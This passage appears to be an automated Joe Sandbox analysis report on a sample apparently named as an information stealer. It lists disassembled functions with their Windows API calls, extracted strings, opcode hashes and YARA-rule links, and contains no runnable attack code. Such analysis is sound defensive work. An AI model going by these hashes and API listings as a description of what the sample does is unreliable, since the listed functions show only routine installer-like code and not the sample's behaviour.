                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                      • Instruction ID: 9ce9006c7efe0e295c62b19728fd4cefc49dc0859d988232a6709833799ab1ee
                                      • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                      • Instruction Fuzzy Hash: 8E516730230E2657DB346D6C8476BBFA7859B0630BF184809EC4AC76C2C275ADBD879D
                                      Function 0023EFE2 Relevance: .2, Instructions: 161COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8f7be8b81b8a4f2cd4525b23fc96c60d737f02945e72e642e70f3e9554c9005
                                      • Instruction ID: 4dc789c6543ad27868b4d2903e94d131d41991fe4dc716e48b44f62c4cdbff51
                                      • Opcode Fuzzy Hash: b8f7be8b81b8a4f2cd4525b23fc96c60d737f02945e72e642e70f3e9554c9005
                                      • Instruction Fuzzy Hash: 3651EA759183D54FC711CF38E64046EBFE0AFAA314F4A09ADE4D95B243C231DA5ACB62
                                      Function 002400B7 Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3871093038937a00da40150eea7a6313335062dec76663d0dcced0d56769257a
                                      • Instruction ID: 511edc174b011983205c69c94ef4f603a980b7c4745ce236542e631aad1ba204
                                      • Opcode Fuzzy Hash: 3871093038937a00da40150eea7a6313335062dec76663d0dcced0d56769257a
                                      • Instruction Fuzzy Hash: D851E0B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734E959CB9A
                                      Function 00243E0B Relevance: .1, Instructions: 112COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                      • Instruction ID: caaffd9546945b6ac4aa84cca1da880e695aefa33196cf678185b12c050cea57
                                      • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                      • Instruction Fuzzy Hash: 1031C4B1A247468FCB18DF28C85126ABBE0FB95314F10492DE4D5C7742C775EA1ACB91
                                      Function 0023E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 0023E30E
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                        • Part of subcall function 00241DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00271030,00000200,0023D928,00000000,?,00000050,00271030), ref: 00241DC4
                                      • _strlen.LIBCMT ref: 0023E32F
                                      • SetDlgItemTextW.USER32(?,0026E274,?), ref: 0023E38F
                                      • GetWindowRect.USER32(?,?), ref: 0023E3C9
                                      • GetClientRect.USER32(?,?), ref: 0023E3D5
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0023E475
                                      • GetWindowRect.USER32(?,?), ref: 0023E4A2
                                      • SetWindowTextW.USER32(?,?), ref: 0023E4DB
                                      • GetSystemMetrics.USER32(00000008), ref: 0023E4E3
                                      • GetWindow.USER32(?,00000005), ref: 0023E4EE
                                      • GetWindowRect.USER32(00000000,?), ref: 0023E51B
                                      • GetWindow.USER32(00000000,00000002), ref: 0023E58D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                      • String ID: $%s:$CAPTION$d$t&
                                      • API String ID: 2407758923-470129426
                                      • Opcode ID: 89d4961ffede6a035c34883062d78f01102bf339a38e77df88ca4ff9ef12c3f5
                                      • Instruction ID: 296adaa8cf152d9f816f9260f4820fab59d54e7626c9194089715653c52a4b9c
                                      • Opcode Fuzzy Hash: 89d4961ffede6a035c34883062d78f01102bf339a38e77df88ca4ff9ef12c3f5
                                      • Instruction Fuzzy Hash: C081B4B2114301AFDB10DF68DC89B6FBBE9EFC8714F05091DFA8897290D670E9198B52
                                      Function 0025CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0025CB66
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C71E
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C730
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C742
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C754
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C766
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C778
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C78A
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C79C
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7AE
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7C0
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7D2
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7E4
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7F6
                                      • _free.LIBCMT ref: 0025CB5B
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 0025CB7D
                                      • _free.LIBCMT ref: 0025CB92
                                      • _free.LIBCMT ref: 0025CB9D
                                      • _free.LIBCMT ref: 0025CBBF
                                      • _free.LIBCMT ref: 0025CBD2
                                      • _free.LIBCMT ref: 0025CBE0
                                      • _free.LIBCMT ref: 0025CBEB
                                      • _free.LIBCMT ref: 0025CC23
                                      • _free.LIBCMT ref: 0025CC2A
                                      • _free.LIBCMT ref: 0025CC47
                                      • _free.LIBCMT ref: 0025CC5F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID: h&
                                      • API String ID: 161543041-2887284442
                                      • Opcode ID: 7ba05f304bec0e0b5cdda8eea2417ae0748b5b2ea9a974951673f590fa4e6aa2
                                      • Instruction ID: 6c4dcad2d349cd2e81c040fa2d1b788943b3669b8c2a7163b46b28a7be2ee1a2
                                      • Opcode Fuzzy Hash: 7ba05f304bec0e0b5cdda8eea2417ae0748b5b2ea9a974951673f590fa4e6aa2
                                      • Instruction Fuzzy Hash: 393165315213069FDB20AE38D845B5A77F9EF10316F20541AE958E7191EF75EC68CF18
                                      Function 002596F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00259705
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 00259711
                                      • _free.LIBCMT ref: 0025971C
                                      • _free.LIBCMT ref: 00259727
                                      • _free.LIBCMT ref: 00259732
                                      • _free.LIBCMT ref: 0025973D
                                      • _free.LIBCMT ref: 00259748
                                      • _free.LIBCMT ref: 00259753
                                      • _free.LIBCMT ref: 0025975E
                                      • _free.LIBCMT ref: 0025976C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID: 0d&
                                      • API String ID: 776569668-146151388
                                      • Opcode ID: f37c1c38e1a53b9fc895df96bd80d3b3f50b461f54264c204f0af38e1bdbeb73
                                      • Instruction ID: a5565038d851579f691bd60479016844f2757a40fa94e56747c04e42262cc1f4
                                      • Opcode Fuzzy Hash: f37c1c38e1a53b9fc895df96bd80d3b3f50b461f54264c204f0af38e1bdbeb73
                                      • Instruction Fuzzy Hash: CE11937612110DAFCB01EF64C842CD93BB5EF14351B5154A1FF089F262DE72DAA89F88
                                      Function 00249711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00249736
                                      • _wcslen.LIBCMT ref: 002497D6
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 002497E5
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00249806
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0024982D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 1777411235-4209811716
                                      • Opcode ID: 858465fdc503a6b28b5c78b11fa23b8bf244ee034af2edf341242a8d614b676f
                                      • Instruction ID: fb34b6019731b63425fdf75814dc7900c5fc8553e83c84797c3350ca2471f60c
                                      • Opcode Fuzzy Hash: 858465fdc503a6b28b5c78b11fa23b8bf244ee034af2edf341242a8d614b676f
                                      • Instruction Fuzzy Hash: F4316E325383027BD729AF349C46F6B779CEF53321F14011DF901961D1EB709AA88BAA
                                      Function 0024D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 0024D6C1
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 0024D6ED
                                        • Part of subcall function 00241FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0023C116,00000000,.exe,?,?,00000800,?,?,?,00248E3C), ref: 00241FD1
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0024D709
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0024D720
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0024D734
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0024D75D
                                      • DeleteObject.GDI32(00000000), ref: 0024D764
                                      • GetWindow.USER32(00000000,00000002), ref: 0024D76D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                      • String ID: STATIC
                                      • API String ID: 3820355801-1882779555
                                      • Opcode ID: f231a21d102ba85f96ac2edeca6919b1934d4ea2721dc44248d46b2a1df967f0
                                      • Instruction ID: 4796218bc39ef3a8d04a7ae0100229f08bbfc7128b75d43f46895765bb2f7068
                                      • Opcode Fuzzy Hash: f231a21d102ba85f96ac2edeca6919b1934d4ea2721dc44248d46b2a1df967f0
                                      • Instruction Fuzzy Hash: 811126765A43117BE621AF70AC8EFAFB65CAF44711F014122FA41E20A1DB64CF254AB5
                                      Function 00252E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 322700389-393685449
                                      • Opcode ID: 82a4ff6693e2dccf6612a8380ace36f985f930d869f163d8a98882fe50b57469
                                      • Instruction ID: d22bb6b525d2fddf41d63f6c3b036d9fb4a358ef229245481dde7c5129e9ce9f
                                      • Opcode Fuzzy Hash: 82a4ff6693e2dccf6612a8380ace36f985f930d869f163d8a98882fe50b57469
                                      • Instruction Fuzzy Hash: 2EB19B3282020AEFCF25DFA4C8819AEB7B5BF05352F148459EC056B252D731DA79CF99
                                      Function 0023AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n$
                                      • API String ID: 3519838083-3484856611
                                      • Opcode ID: 8c607397ccfe4af3aa91f639bc0e43cc40fd04a2bfbe6e019d675eb8d396d1d7
                                      • Instruction ID: 6139f397195dfa09c83fbcbd4f9560d5e960b1e990f8464dedaf376d2f35c0b9
                                      • Opcode Fuzzy Hash: 8c607397ccfe4af3aa91f639bc0e43cc40fd04a2bfbe6e019d675eb8d396d1d7
                                      • Instruction Fuzzy Hash: CE716CB0A10219AFDF14DFA4DC999AEB7B9FF49310F144169E516A72A0CB70AD41CB60
                                      Function 00236FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00236FAA
                                      • _wcslen.LIBCMT ref: 00237013
                                      • _wcslen.LIBCMT ref: 00237084
                                        • Part of subcall function 00237A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00237AAB
                                        • Part of subcall function 00237A9C: GetLastError.KERNEL32 ref: 00237AF1
                                        • Part of subcall function 00237A9C: CloseHandle.KERNEL32(?), ref: 00237B00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 3122303884-3508440684
                                      • Opcode ID: 3e890ea32693eafa344435b0c3dec7864c9b43d9e647b58993f8b11a2e0c4ee7
                                      • Instruction ID: 08d2292670f3bbc1bf84cfbda0bc68f9784c7e07492ae5afc00d178d55455dbd
                                      • Opcode Fuzzy Hash: 3e890ea32693eafa344435b0c3dec7864c9b43d9e647b58993f8b11a2e0c4ee7
                                      • Instruction Fuzzy Hash: 4E41FAF1D2434579EF30EB749C86FEE776C9F05314F004455FA85A7182D6709AA88B21
                                      Function 0024B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • EndDialog.USER32(?,00000001), ref: 0024B610
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0024B637
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0024B650
                                      • SetWindowTextW.USER32(?,?), ref: 0024B661
                                      • GetDlgItem.USER32(?,00000065), ref: 0024B66A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0024B67E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0024B694
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      • Opcode ID: b547ef19b3a96ea939dffb09f49f92e2c64f0ccbee486ea2210caba537e79fa8
                                      • Instruction ID: b7467812e86f8ac40dd4cad5ca292a540ff0cc9cfeb7a535154830fc0d444930
                                      • Opcode Fuzzy Hash: b547ef19b3a96ea939dffb09f49f92e2c64f0ccbee486ea2210caba537e79fa8
                                      • Instruction Fuzzy Hash: 1C21C932624215BBD616DF76FD4EF3B3B6DEB46B85F020016FA04D60A0CB62D9219B35
                                      Function 0024FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,4409F1A1,00000001,00000000,00000000,?,?,0023AF6C,ROOT\CIMV2), ref: 0024FD99
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0023AF6C,ROOT\CIMV2), ref: 0024FE14
                                      • SysAllocString.OLEAUT32(00000000), ref: 0024FE1F
                                      • _com_issue_error.COMSUPP ref: 0024FE48
                                      • _com_issue_error.COMSUPP ref: 0024FE52
                                      • GetLastError.KERNEL32(80070057,4409F1A1,00000001,00000000,00000000,?,?,0023AF6C,ROOT\CIMV2), ref: 0024FE57
                                      • _com_issue_error.COMSUPP ref: 0024FE6A
                                      • GetLastError.KERNEL32(00000000,?,?,0023AF6C,ROOT\CIMV2), ref: 0024FE80
                                      • _com_issue_error.COMSUPP ref: 0024FE93
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                      • String ID:
                                      • API String ID: 1353541977-0
                                      • Opcode ID: 15722b2ebee44b768b88701de0e2fa6a8f441b2c512008eab4b59235982bb2e8
                                      • Instruction ID: da570bd35823cb86c104eefee6a6bd4e53c3071b25a2efed3d69635f550660b5
                                      • Opcode Fuzzy Hash: 15722b2ebee44b768b88701de0e2fa6a8f441b2c512008eab4b59235982bb2e8
                                      • Instruction Fuzzy Hash: 01412A71B10215EFCB14DF68DD45BAEBBA8EF88711F10823AF905E7291D7749920CBA4
                                      Function 00239382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00239387
                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002393AA
                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 002393C9
                                        • Part of subcall function 0023C29A: _wcslen.LIBCMT ref: 0023C2A2
